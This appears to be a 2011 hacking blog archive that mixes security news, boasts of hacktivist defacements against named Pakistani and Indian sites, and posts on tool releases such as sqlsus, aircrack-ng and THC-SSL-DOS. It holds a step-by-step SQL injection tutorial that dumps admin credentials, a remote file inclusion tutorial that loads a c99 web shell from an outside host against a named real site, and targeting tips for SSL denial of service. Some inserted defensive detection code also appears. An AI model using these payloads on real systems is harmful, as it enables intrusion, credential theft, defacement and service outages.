Wednesday, 30 November 2011

Twitter Purchases WhisperCore – Full Disk Encryption For Android Phones

Whisper Systems’ offerings include WhisperCore, software that enables full disk encryption as well as management tools for Android phones. It’s free for individual users while enterprise customers pay for the software. Other Whisper Systems products include text encryption, voice encryption, firewall software and encrypted backup.
In a blog post about the acquisition, Whisper Systems didn’t say much about what Twitter might be planning to do with the technology. “Now that we’re joining Twitter, we’re looking forward to bringing our technology and our expertise into Twitter’s products and services,” the company wrote on the blog.
It said that Whisper Systems software will continue to be available but that during a transition period the company will take the products and services offline. In a forum on Whisper Systems’ website, people who are apparently unaware of the acquisition are already wondering why they can’t download products. Twitter did not reply to a request for comment about its plans for the technologies.

The only path I can see, obvious path that is, would be for Twitter to integrate the encryption technology offered by WhisperCore into the official Twitter apps – making them more secure in both storing data locally and in transmitting data over insecure networks. I don’t see how it really offers any value though, it’s not like anyone is actually sending anything important out over Twitter – apart from the odd DM (Direct Message) I would imagine.

It’ll be interesting to see what direction they take though and if we can actually find out why this acquisition took place.
WhisperCore has a number of features designed to make up for security shortcomings in Android. For instance, WhisperCore users can selectively revoke permissions that an app requests while allowing the user to still use the app.
The software also includes a feature aimed at thwarting someone who has stolen a phone from determining the phone’s unlock code based on finger smudges on the screen. Some Android phones display rows of dots and a user unlocks the phone by dragging a finger over certain dots in a set pattern. An attacker might be able to recreate the pattern by examining finger smudges on the screen. WhisperCore displays unlock numbers in a column, so an attacker doesn’t know in which order the user hits the numbers to unlock the phone.

Earlier this year Whisper Systems released a software development kit so that developers could start building some WhisperCore features into their applications. Few other companies are doing full disk encryption for Android, although there are many other companies taking other approaches to securing Android phones. Companies like 3LM and Good Technology offer mobile security services for enterprises. In addition, mobile device management products from companies including Sybase, BoxTone, Zenprise, Mobile Iron and Fiberlink let IT managers set basic policies like password requirements and remote wipe, and offer additional security capabilities.

Tuesday, 29 November 2011

Facebook Hit By Classic Worm Attack

Zeus Trojan spreads when user views 'photos'; Facebook now blocking malicious domains spreading the attack.

A worm spreading via Facebook infects victims with a variant of the dangerous Zeus Trojan. The attack, which was first found by researchers at CSIS in Denmark, spreads via phony posts from an infected Facebook user's account that pretends to contain photos.
Like previous Facebook scams, it uses stolen account credentials to log in and then spam the victim account's "Friends" with the malicious posts. While a screenshot of the file appears to have a .jpg suffix, it's really a malicious screensaver file, according to Jovi Umawing, a security expert at GFI Software.
"The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare." If you are using any virtual machine then it will infect your current OS.
Facebook has blocked the offending domains spreading the Trojan. "We are constantly monitoring the situation and are in the process of blocking domains as we discover them. We have internal systems in place configured specifically to monitor for variations of the spam and are working with others across the industry to pursue both technical and legal avenues to fight the bug," a Facebook spokesperson says. 
"Facebook is built to easily allow people to share pictures, videos, and other content -- and people trust what they are receiving from their friends," says Mike Geide, senior security researcher at Zscaler ThreatLabZ Malware. "[For example], this recent example can take advantage of the sharing mechanisms and user's trust of their friends within social networking."
Meanwhile, new research published today from Norman ASA found that Zeus-based attacks are actually on the decline this year: While there were 20,000 Zeus-related incidents in January, according to Norman, there were "nearly negligible levels" of Zeus threats discovered in September.

#OpRobinHood : Thousands of United Nation logins leaked by TeaMp0isoN

The online "hacktivist" collective Anonymous and the hackers of Team Poison have joined forces for a new group effort known as 'Operation Robin Hood', which plans to target banks in an effort to give money back to the people.

The first victim of Operation Robin Hood was the First National Bank of Long Island: the hacktivists behind the operation revealed the vulnerabilities present in the bank's website.

TeaMp0isoN today hacked the United Nations website (www.undp.org) and leaked thousands of login usernames, passwords and emails.
The leaked account details are posted on pastebin.

Saturday, 26 November 2011

Indian security and hacker websites got hacked by Shadow008

More than 100 Pakistani websites got hacked by ICA

The list of websites is as follows:

If you want to see mirrors of the websites, click here.

More than 111 Pakistani websites got hacked by ICA

This Mass Deface Cyber Attack is done by Team ICA of www.indishell.in 
We are the only real & first ever INDIAN CYBER ARMY [ICA] made and existing !!
Rest In Peace the Heroes of 26/11 Mumbai Attacks !
We will Never Forget your sacrifice and We never will let porkis and this world forget it too !
You can see the hacked sites list here.


National program for Cyber army to be launched in India

Increasing attacks on cyberspace in India have brought several professionals and experts from the industry together, with the support of the Government of India, to jointly form a national-level program to identify credible and valuable information security experts. The program, "National Security Database", is all set to launch this Saturday in Mumbai at a major information security conference, MalCon. The database will include ethical hackers and programmers who can protect the country’s cyberspace. They will all be registered with the National Security Database, a brainchild of the Information Sharing and Analysis Center (ISAC).

The need for such a database originated after the 2008 attacks in Mumbai, when cyber security professionals realised that a lot needed to be done in the area. "It is observed that some or other form of electronic notification is usually sent before a major terrorist attack, followed by defacement of government web sites. Professional cyber security professionals can make a lot of difference in investigations and help in the entire episode," said Rajshekhar Murthy, director of ISAC. The issue of forming a credible repository of cyber security professionals who can be trusted with sensitive information, and who can be of use in case of an emergency, was also raised in a conference held last year.

"After a lot of brainstorming and analysis the database is in place and will be flagged off on November 26 in Mumbai," said Murthy. As per estimates there are over a lakh cyber security experts and hackers in India who as of now function individually. Each one of them has a certain area of specialisation. "They will be brought in to the NSD after a rigorous test which would test their skills. Also they would be made to undergo psychometric tests over and above the tasks that they would have to perform to test their personal skills. Once they clear all levels they would be empaneled in the NSD program in applied areas of specialisation," added Murthy. Fraud investigation, web security and mobile security are some of the areas of specialisation in NSD.

The database, which has been secretly worked on for the last two years on an invitation-only basis, already has a sizeable number of experts who have developed malware and software to hack into devices like the iPhone and Xbox Kinect, which are slated for release at the malware conference MalCon. The database will come in handy each time the country is under threat on the cyberspace front. "The next generation of attacks will not be only on ground but also on country’s cyberspace," said Murthy, citing the example of a recent attack on some government computers after which the hackers released sensitive information pertaining to the military and communication between India and Moscow.

Companies like QuickHeal and Security Compass, among others, have already given support to the database and will be hiring security professionals with a direct final interview. "Since NSD professionals will have to go through a tough eight-hour lab exam, major companies have written in expressing their interest in hiring NSD empaneled professionals. While NSD does not award certification, we are glad about the support from the industry," stated Murthy.

The biggest challenge for NSD now is to reach both hackers and professionals and identify them with skills in existing areas of specialization. "We have already identified several across the country. Their motivation is that once they are registered with NSD they not only get to upgrade their skills and knowledge but will also be of service to the country. We are collaborating with government agencies looking after cyber security, all of whom are looking forward to the NSD," said Murthy.

The program will be flagged off at the International Malware Conference, MALCON, scheduled to be held at the JW Marriott on November 26. Sachin Pilot, Minister of State for Communication and Information Technology, is also going to join the conference via video conference from Delhi. His office confirmed that Pilot would share his views on cyber security and extend their endorsement to the National Security Database. Officials from the National Technical Research Organisation, a government body which looks at cyber security, too have shown keen interest in the NSD. "It is a great initiative which will be of use to the nation and will provide a database of cyber security professionals," said an NTRO official who declined to be named.

Friday, 25 November 2011

VoIP Hopper 2.01 Released – IP Phone VLAN Hopping Tool

VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific ethernet switches. VoIP Hopper does this by mimicking the behavior of an IP Phone, in Cisco, Avaya, and Nortel environments.

This requires two important steps in order for the tool to traverse VLANs for unauthorized access. First, discovery of the correct 12-bit Voice VLAN ID (VVID) used by the IP phones is required. VoIP Hopper supports multiple protocol discovery methods (CDP, DHCP, LLDP-MED, 802.1q ARP) for this important first step. Second, the tool creates a virtual VoIP Ethernet interface on the OS. It then inserts a spoofed 4-byte 802.1q VLAN header containing the 12-bit VVID into a spoofed DHCP request.
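To make the 12-bit VVID concrete, here is a parser for the 4-byte 802.1q tag the text refers to. This is an added example, not VoIP Hopper's code: it pulls the 3-bit priority, the drop-eligible bit and the 12-bit VLAN ID out of the tag control field, and the frame bytes used with it are constructed here. A defender capturing on an access port can use it to confirm whether tagged voice frames, and which VVID, are visible to an untrusted host.

```python
import struct

TPID_8021Q = 0x8100  # EtherType value announcing that a 4-byte 802.1q tag follows


def parse_frame(frame):
    """Split an Ethernet frame into addresses, optional 802.1q tag fields and payload.

    Layout: dst(6) src(6) [TPID(2) TCI(2)] ethertype(2) payload.
    The TCI is PCP(3 bits) | DEI(1 bit) | VID(12 bits), most significant first.
    """
    if len(frame) < 14:
        raise ValueError("frame shorter than the 14-byte Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    info = {"dst": dst.hex(":"), "src": src.hex(":"), "vlan": None}
    offset = 14
    if ethertype == TPID_8021Q:
        if len(frame) < 18:
            raise ValueError("802.1q tag truncated")
        tci, ethertype = struct.unpack("!HH", frame[14:18])
        info["vlan"] = {
            "pcp": tci >> 13,        # 3-bit priority code point
            "dei": (tci >> 12) & 1,  # 1-bit drop-eligible indicator
            "vid": tci & 0x0FFF,     # 12-bit VLAN ID; on a tagged phone frame this is the VVID
        }
        offset = 18
    info["ethertype"] = ethertype
    info["payload"] = frame[offset:]
    return info


def vids_seen(frames):
    """Set of VLAN IDs carried by the tagged frames in a capture (untagged frames are skipped)."""
    vids = set()
    for frame in frames:
        vlan = parse_frame(frame)["vlan"]
        if vlan is not None:
            vids.add(vlan["vid"])
    return vids


if __name__ == "__main__":
    # Constructed frame: broadcast dst, made-up src, tag with PCP 5 and VID 100, IPv4 payload.
    sample = bytes.fromhex("ffffffffffff" "001122334455" "8100" "a064" "0800") + b"\x45\x00"
    print(parse_frame(sample))
```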

New Features
  • New “Assessment” mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown network infrastructure
  • New VLAN Discovery methods (802.1q ARP, LLDP-MED)
  • LLDP-MED spoofing and sniffing support
  • Can bypass VoIP VLAN subnets that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP
download voiphopper-2.01.tar.gz

Thursday, 24 November 2011

Web App Pentesting - Pentest Magazine

  • The significance of HTTP and the Web for Advanced Persistent Threats
  • Web Application Security and Penetration Testing
  • Developers are from Wenus, Application Security guys from Mars
  • Pulling legs of Arachni
  • XSS BeeF Metasploit Exploitation
  • Cross-site request forgery. In-depth analysis
  • First the Security Gate, then the Airplane
Download Magazine

PHP Vulnerability Hunter v.1.1.4.6

PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.


Change Log:
  • Added code coverage report
  • Updated GUI validation
  • Several instrumentation fixes
  • Fixed lingering connection issue
  • Fixed GUI and report viewer crashes related to working directory

Wednesday, 23 November 2011

sqlsus 0.7.1 Released – MySQL Injection & Takeover Tool

sqlsus is an open source MySQL injection and takeover tool, written in Perl. Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries, download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database, and much more. Whenever relevant, sqlsus will mimic a MySQL console output.

  • Added time-based blind injection support (added option “blind_sleep”, and renamed “string_to_match” to “blind_string”).
  • It is now possible to force sqlsus to exit when it’s hanging (i.e.: retrieving data), by hitting Ctrl-C more than twice.
  • Rewrite of “autoconf max_sendable”, so that sqlsus will properly detect which length restriction applies. (removed option “max_sendable”, added options “max_url_length” and “max_inj_length”)
  • Uploading a file now sends it into chunks under the length restriction.
  • sqlsus now saves variables after each command, so that forcing it to quit (or killing it) will not discard the changes that were made.
  • Added a progress bar to inband mode, sqlsus now determines the number of rows to be returned prior to fetching them.
  • get db (tables/columns) in inband mode now uses multithreading (like everything else).
  • clone now uses count(*) if available (set by “get count” / “get db”), instead of using fetch-ahead.
  • sqlsus now prints what configuration options are overridden (when a saved value differs from the configuration file).
You can download sqlsus 0.7.1 here:
sqlsus-0.7.1.tgz

X-Scan by XFocus – Basic Free Network Vulnerability Scanner

X-Scan is a general scanner for scanning network vulnerabilities on a specific IP address range or a stand-alone computer using a multi-threading method; plug-ins are supported. This is an old tool, but some people still find it useful, and there are certain situations where it can be useful.


The following items can be scanned:
  • Remote OS type and version detection,
  • Standard port status and banner information,
  • SNMP information,
  • CGI vulnerability detection,
  • IIS vulnerability detection,
  • RPC vulnerability detection,
  • SSL vulnerability detection,
  • SQL-server,
  • FTP-server,
  • SMTP-server,
  • POP3-server,
  • NT-server weak user/password pairs authentication module,
  • NT server NETBIOS information,
  • Remote registry information, etc.
click here to download X-Scan-v3.3-en.rar

Sunday, 20 November 2011

GoLISMERO – Web Application Mapping Tool

GoLISMERO helps you to map a web application, displaying the results in a readable format for security auditors.


Features
  • Map a web application.
  • Show all links and form params in a comfortable format.
  • Save results in several formats: text, csv, html, raw (for parsing with a bash script) and wfuzz script.
  • Detect common vulnerabilities of web applications.
  • Filter web information retaining only what is important.
  • Many other features you can find very useful.
You can download GoLISMERO here:

GoLISMERO_last.zip



Thursday, 17 November 2011

Acunetix Web Vulnerability Scanner 8 BETA Released for Download



Click Here To download 


Tuesday, 15 November 2011

Hack website using SQL INJECTION

In this tutorial I am going to show you how SQL injection works and how it is used to get the database from a website.

What is SQL Injection?
It is the most common web application vulnerability. It allows an attacker to execute SQL queries, so the website gets hacked.

There are two types of SQL injection:

1. SQL Injection

2. Blind SQL Injection
So let's start.

1. Check for vulnerability
The most famous Google dork is "inurl:php?id=".
Let's say that we have some site like this:
http://www.site.com/journal.php?id=6
Now, to test if it is vulnerable, we add ' (a single quote) to the end of the URL,
so it becomes http://www.site.com/journal.php?id=6'
If we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right ... etc."
that means it is vulnerable to SQL injection.

2. Find the number of columns
To find the number of columns we use the ORDER BY statement (it tells the database how to order the result).
We increase the number until we get an error like the one above.
http://www.site.com/journal.php?id=6 order by 1/* <-- no error
http://www.site.com/journal.php?id=6 order by 2/* <-- no error
http://www.site.com/journal.php?id=6 order by 3/* <-- no error
http://www.site.com/journal.php?id=6 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something similar)
That means the query has 3 columns, because we got an error on 4.

3. Check for UNION (to find which column number is displayed on the page)
http://www.site.com/journal.php?id=6 union all select 1,2,3/*
If you don't see a number, try adding a "-" sign after id=, so the URL becomes
http://www.site.com/journal.php?id=-6 union all select 1,2,3/*
If we see some numbers on the screen, i.e. 1 or 2 or 3, then the UNION works.

4. Check the MySQL version
http://www.site.com/journal.php?id=6 union all select 1,2,3/* NOTE: if /* does not work or you get some error, then try -- instead.
We replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
It should look like this: http://www.site.com/journal.php?id=6 union all select 1,@@version,3/*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ...":
I didn't see any paper covering this problem, so I must write it.
What we need is the convert() function,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,convert(@@version using latin1),3/*
or hex() and unhex(),
i.e.
http://www.site.com/journal.php?id=6 union all select 1,unhex(hex(@@version)),3/*
and you will get the MySQL version.

5. Getting table and column names
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <-- later I will describe MySQL > 5 versions.
We must guess table and column names in most cases.
Common table names are: user/s, admin/s, member/s ...
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e. it would be
http://www.site.com/journal.php?id=6 union all select 1,2,3 from admin/*
If this works, we know that the table admin exists.
Now to check column names:
http://www.site.com/journal.php?id=6 union all select 1,username,3 from admin/* (we get the username displayed on the screen, for example admin, or superadmin etc.)
Now to check if the column password exists:
http://www.site.com/journal.php?id=6 union all select 1,password,3 from admin/*
We see the password on the screen as a hash or in plain text; it depends on how the database is set up,
i.e. md5 hash, mysql hash, sha1.
To show both at once we can use the concat() function (it joins strings),
i.e.
http://www.site.com/journal.php?id=6 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a, the hex value for : (so 0x3a is the hex value for a colon).
(There is another way for that: char(58), the ASCII value for :)
http://www.site.com/journal.php?id=6 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on the screen, i.e. admin:admin or admin:somehash.
When you have this, you can log in as admin or some superuser.
If you can't guess the right table name, you can always try mysql.user (default);
it has user and password columns, so the example would be
http://www.site.com/journal.php?id=6 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6. MySQL 5
Like I said before, I'm going to explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in the database.
To get tables we use table_name and information_schema.tables,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables/*
Here we replace our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note that I put 0,1.
Now to view the second table, we change limit 0,1 to limit 1,1,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table is displayed.
For the third table we put limit 2,1,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same.
Here we use column_name and information_schema.columns;
the method is the same as above, so the example would be
http://www.site.com/journal.php?id=6 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is displayed.
The second one,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing until you get something like
username, user, login, password, pass, passwd etc...
If you want to display column names for a specific table, use this query (WHERE clause).
Let's say that we found the table users,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get the column names in table users displayed. Just using LIMIT we can list all columns in table users.
We found columns user, pass and email.
Now to complete the query and put them all together,
for that we use concat(), which I described earlier,
i.e.
http://www.site.com/journal.php?id=6 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
What we get here is user:pass:email from table users.
Example: admin:hash:whatever@blabla.com
Now find the admin panel and log in as ADMIN :D

w3af v1.1 Released For Download – Web Application Attack & Audit Framework

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.




Finally it’s out of BETA and RC and there’s now a stable core for the codebase.

New in v1.1
  • Considerably increased performance by implementing gzip encoding
  • Enhanced embedded bug report system using Trac’s XMLRPC
  • Fixed hundreds of bugs
  • Fixed critical bug in auto-update feature
  • Enhanced integration with other tools (bugs fixed and more info added to the file)
You can download w3af v1.1 here:
w3af-1.1.tar.bz2

Monday, 14 November 2011

RFI (Remote File Inclusion) : Website Hacking Tutorial

Hello friends, here I am posting another method of website hacking called RFI (Remote File Inclusion).
Remote File Inclusion (RFI) is a type of vulnerability often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

Let's start
1st Step: Find vulnerable websites using a Google dork
Click here to get more RFI dorks
"inurl:index.php?page=" is a dork for RFI hacking.
It will show all the pages which have "index.php?page=" in their URL. Now, to test whether the website is vulnerable to Remote File Inclusion or not, the hacker uses the following URL:
www.targetsite.com/index.php?page=www.google.com



See the example of this website: http://www.cbspk.com

So the hacker's URL will look like
http://www.cbspk.com/v2/index.php?page=http://www.google.com

If, after loading the URL, the Google homepage shows up, then the website is vulnerable to this attack; if it does not come up, then you should look for a new target. In my case, after entering the above URL in the address bar, the Google homepage showed up, indicating that the website is vulnerable to this attack.

Now the hacker would upload a shell to gain access. The most common shells used are the c99 shell and the r57 shell. I would use the c99 shell. You can download the c99 shell from the link below:

http://www.sh3ll.org/c99.zip

Now we need to upload the shell to a web hosting site such as ripway.com, viralhosts.com, 110mb.com or another free host.

Now here is how a hacker would execute the shell to gain access. Let's say that the URL of the shell is http://www.sh3ll.org/c99.txt?

The hacker would then load the following URL to gain access:

http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?

Don't forget to add "?" after .txt at the end of the URL, or else the shell will not execute. Now the hacker is inside the website and can do anything with it.
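How a defender spots, in the web server's access log, the probe and shell-load requests described above, and how the vulnerable index.php should resolve its page parameter instead. This is an added example, not from the post: the log lines are constructed (documentation IP ranges and an example.invalid host), and ALLOWED_PAGES with its entries is an assumption standing in for whatever pages the real site has.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Any value that names a scheme (http:, https:, ftp:, ...) would make include() fetch remote code.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.IGNORECASE)

# Constructed sample lines: the benign requests, the Google probe from the tutorial,
# a percent-encoded shell load (note the trailing %3F, the "?" the post insists on),
# and a scheme-less //host form.
SAMPLE_LOG = """\
203.0.113.9 - - [14/Nov/2011:10:01:02 +0000] "GET /v2/index.php?page=about HTTP/1.1" 200 5123
203.0.113.9 - - [14/Nov/2011:10:01:07 +0000] "GET /v2/index.php?page=http://www.google.com HTTP/1.1" 200 14022
203.0.113.9 - - [14/Nov/2011:10:01:15 +0000] "GET /v2/index.php?page=http%3A%2F%2Fexample.invalid%2Fc99.txt%3F HTTP/1.1" 200 30110
198.51.100.4 - - [14/Nov/2011:10:02:00 +0000] "GET /v2/index.php?page=contact HTTP/1.1" 200 4001
198.51.100.4 - - [14/Nov/2011:10:02:09 +0000] "GET /v2/index.php?page=//example.invalid/c99.txt? HTTP/1.1" 500 0
"""


def page_values(path):
    """All page= values in the request; decoded once more to catch double encoding."""
    query = urlsplit(path).query
    return [unquote(v) for v in parse_qs(query, keep_blank_values=True).get("page", [])]


def is_remote_include(value):
    """True when the include target points off-host: a scheme prefix or //host/..."""
    v = value.strip()
    return bool(SCHEME_RE.match(v)) or v.startswith("//")


def find_rfi_attempts(lines):
    """Return (ip, page value, status) for every request whose page parameter points off-host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in page_values(m["path"]):
            if is_remote_include(value):
                hits.append((m["ip"], value, m["status"]))
    return hits


# The server-side fix: the parameter selects a key from an allowlist and is never used
# as a path or URL, so neither http://... nor ...c99.txt? can reach include().
ALLOWED_PAGES = {  # assumed page set for illustration
    "home": "pages/home.php",
    "about": "pages/about.php",
    "contact": "pages/contact.php",
}


def resolve_page(value, default="home"):
    """Map the request's page parameter to a known file; unknown input falls back to default."""
    return ALLOWED_PAGES[value] if value in ALLOWED_PAGES else ALLOWED_PAGES[default]


if __name__ == "__main__":
    for ip, value, status in find_rfi_attempts(SAMPLE_LOG.splitlines()):
        print(f"{ip} requested page={value!r} (HTTP {status})")
```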


Sunday, 13 November 2011

Mozilla hacked by Hmei7

How to r00t on server : E-book

Hello friends, here I am sharing an ebook on how to root a server.


Click here to download e book

mpf, industrialequipments, gbs, webnwebs hacked by Irfninja Indishell (ICF)

http://www.webnwebs.com
www.gbs.com.pk 
http://www.aoa.org.pk
http://www.industrialequipments.com.pk
www.mpf.com.pk
 

4 famous Pakistani sites (LG, HiKarachi, my.com.pk, PBC Dubai) hacked by ICF (Indian Cyber Force)

http://www.lge.com.pk/
http://www.my.com.pk/
http://www.pbcdubai.com/
http://www.hikarachi.com/
 

Pentesting suite for the Nokia N900

Saturday, 12 November 2011

aircrack-ng – WEP and WPA-PSK Key Cracking tool

aircrack is an 802.11 WEP and WPA-PSK key cracking tool that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:
  • Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
  • More cards/drivers supported
  • New WEP attack: PTW
  • More OS and platforms supported
  • Fragmentation attack
  • Improved cracking speed
  • WEP dictionary attack
  • Capture with multiple cards
  • New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng and airserv-ng
  • Optimizations, other improvements and bug fixing

Download the latest version of aircrack-ng here:
Linux – aircrack-ng-0.9.1.tar.gz
Windows – aircrack-ng-0.9.1-win.zip

Friday, 11 November 2011

THC SSL DoS/DDoS Tool Released For Download

This attack further exploits the SSL secure renegotiation feature to trigger thousands of renegotiations via a single TCP connection.


Usage
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack

This is turned upside down for THC-SSL-DOS: the processing capacity for SSL handshakes is far superior at the client side. A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are suboptimal: servers are prepared to handle large amounts of traffic, and clients are constantly sending requests to the server even when not under attack.
The SSL handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large numbers of SSL handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).
Tips & Tricks for Whitehats
  1. The average server can do 300 handshakes per second. This would require 10-25% of your laptop's CPU.
  2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
  3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, … or the secure database port).
Countermeasures
No real solution exists. The following steps can mitigate (but not solve) the problem:
  1. Disable SSL-Renegotiation
  2. Invest in an SSL Accelerator
Either of these countermeasures can be circumvented by modifying THC-SSL-DOS. A better solution is desirable. Somebody should fix this.
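Detection is the third option the release notes leave out. The following Python script is an added example, not part of THC's tool or its notes: it watches a per-handshake log for the two signatures of this attack, far more handshakes per second from one client than a typical server can serve (the 300/s figure quoted above is the default threshold), and many handshakes carried by a single TCP connection, which is what renegotiation looks like from the server. The log record layout (timestamp, client address, connection id) is an assumption, and the sample events are constructed.

```python
from collections import Counter, defaultdict, deque


def build_sample_events():
    """Constructed sample: (timestamp_seconds, client_ip, connection_id) per
    completed TLS handshake, as a TLS terminator or proxy might record them."""
    events = []
    # One client renegotiating 400 times over a single TCP connection in 0.8 s.
    for i in range(400):
        events.append((100.0 + i * 0.002, "203.0.113.7", 1))
    # Ordinary clients: one handshake per connection, spread over a few seconds.
    for i, ip in enumerate(["198.51.100.2", "198.51.100.3", "198.51.100.4"]):
        events.append((100.0 + i * 1.5, ip, 1000 + i))
    return events


def detect_ssl_exhaustion(events, window=1.0, max_per_window=300, max_per_conn=3):
    """Return alerts for clients exceeding max_per_window handshakes inside any
    `window`-second interval, and for connections carrying more than
    max_per_conn handshakes (repeated renegotiation on one TCP connection)."""
    recent = defaultdict(deque)   # client -> timestamps inside the sliding window
    peak = defaultdict(int)       # client -> highest count seen in one window
    per_conn = Counter()          # (client, connection) -> handshake count

    for ts, client, conn in sorted(events):
        q = recent[client]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        peak[client] = max(peak[client], len(q))
        per_conn[(client, conn)] += 1

    alerts = []
    for client, n in sorted(peak.items()):
        if n > max_per_window:
            alerts.append({"rule": "handshake_rate", "client": client, "count": n})
    for (client, conn), n in sorted(per_conn.items()):
        if n > max_per_conn:
            alerts.append({"rule": "renegotiation_per_connection",
                           "client": client, "connection": conn, "count": n})
    return alerts


if __name__ == "__main__":
    for a in detect_ssl_exhaustion(build_sample_events()):
        print(a)
```

The per-connection rule is the one that distinguishes this tool from an ordinary flood: a client opening 400 connections per second is noisy, but 400 handshakes on one connection has no legitimate explanation and can be blocked or rate-limited at the terminator.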


You can download THC-SSL-DOS here:
Windows: thc-ssl-dos-1.4-win-bin.zip
Linux: thc-ssl-dos-1.4.tar.gz

AnonyOPS.com Hacked By Tha Disastar


Tha Disastar has hacked Anonymous's Operation news site. The reason behind it was that Anonymous were thinking of destroying the Muslim Brotherhood. In return, Indian hackers and Pakistani hackers united and targeted AnonyOPS.com. Both teams worked hard to take it down. Although some Indian hackers were not Muslims, they still chose to be against it and said that Anonymous should stay within limits, and must not go beyond their limits into other people's religion.

Site Hacked:
http://anonyops.com/

Mirror:
 http://www.zone-hack.com/defacements/?id=5822

Cain & Abel – Download the Super Fast and Flexible Password Cracker with Network Sniffing

Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weaknesses present in protocol standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.


Cain & Abel


Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no event shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

Download Cain & Abel v4.9.4 for Windows NT/2000/XP here:
Cain & Abel 4.9.4 or Cain & Abel 4.9.4 (mirror 1)

Remote Network Penetration via NetBios Hack/Hacking

This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.

